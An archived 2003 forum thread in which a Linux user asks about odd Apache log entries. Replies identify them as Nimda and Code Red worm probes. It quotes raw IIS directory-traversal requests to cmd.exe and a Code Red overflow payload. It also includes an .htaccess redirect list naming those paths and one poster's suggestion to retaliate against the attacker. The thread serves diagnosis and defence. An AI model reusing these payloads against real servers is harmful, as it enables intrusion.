PDA

Click to See Complete Forum and Search --> : Apache Log, what does this mean?

mazeroth
02-26-2003, 01:48 AM
What do these mean? My apache error logs are filled with these and I don't know what they are.


[Tue Feb 25 12:40:55 2003] [error] [client ##.##.##.##] unable to include potential exec "include/top.html" in parsed file /var/www/error/HTTP_NOT_FOUND.html.var

[Tue Feb 25 12:40:55 2003] [error] [client ##.##.##.##] unable to include potential exec "include/bottom.html" in parsed file /var/www/error/HTTP_NOT_FOUND.html.var


And my access log has very weird stuff like this... My guess is someone is trying to break in...

66.20.89.147 - - [16/Feb/2003:10:30:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 193 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 193 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"



What do you guys think? The only services enabled in my server are ssh and httpd. I guess I would need to learn more about iptables to block people if they are trying to break in through an enabled service? Or use portsentry? Thanks.
endoalpha
02-26-2003, 02:16 AM
check here: http://www.cert.org/advisories/CA-2001-26.html

It is the nimda or codered worm. It does not affect apache. Only Microsoft IIS 4.0/5.0 servers... go figure
TheMatr1x
02-27-2003, 11:06 AM
Heh, if that keeps happining, get the dirs its trying to search, and make some files called that and make them block the computer thats doing that or screw it up or something
ixthus
02-27-2003, 08:53 PM
Originally posted by mazeroth
What do these mean? My apache error logs are filled with these and I don't know what they are.


here is an older thread on this (http://justlinux.com/forum/showthread.php?s=&threadid=80639)
Judi C.
03-02-2003, 04:36 PM
If you add these lines to your htaccess it will stop all the 404 page not found.


redirect /scripts http://www.virus_be_gone.antivirus
redirect /scripts/..%255c%255c../winnt http://www.virus_be_gone.antivirus
redirect /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir http://www.virus_be_gone.antivirus
redirect /scripts/..%c0%af../winnt/system32/ http://www.virus_be_gone.antivirus
redirect /scripts/..%c1%9c../winnt/system32/ http://www.virus_be_gone.antivirus
redirect /MSADC http://www.virus_be_gone.antivirus
redirect /c http://www.virus_be_gone.antivirus
redirect /d http://www.virus_be_gone.antivirus
redirect /_mem_bin http://www.virus_be_gone.antivirus
redirect /msadc http://www.virus_be_gone.antivirus
redirect /w3c http://www.virus_be_gone.antivirus
redirect /_vti_bin/shtml.exe

Those entry logs you posted are the NIMBA virus.
The CODERED will log as this:
210.96.137.172 - - [18/Oct/2002:16:47:17 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0"
ixthus
03-02-2003, 05:41 PM
Originally posted by Judi C.
If you add these lines to your htaccess it will stop all the 404 page not found. . . . . .


Thank you, I'll give it a try.....I hate giving up resources for those that don't appreciate them :mad: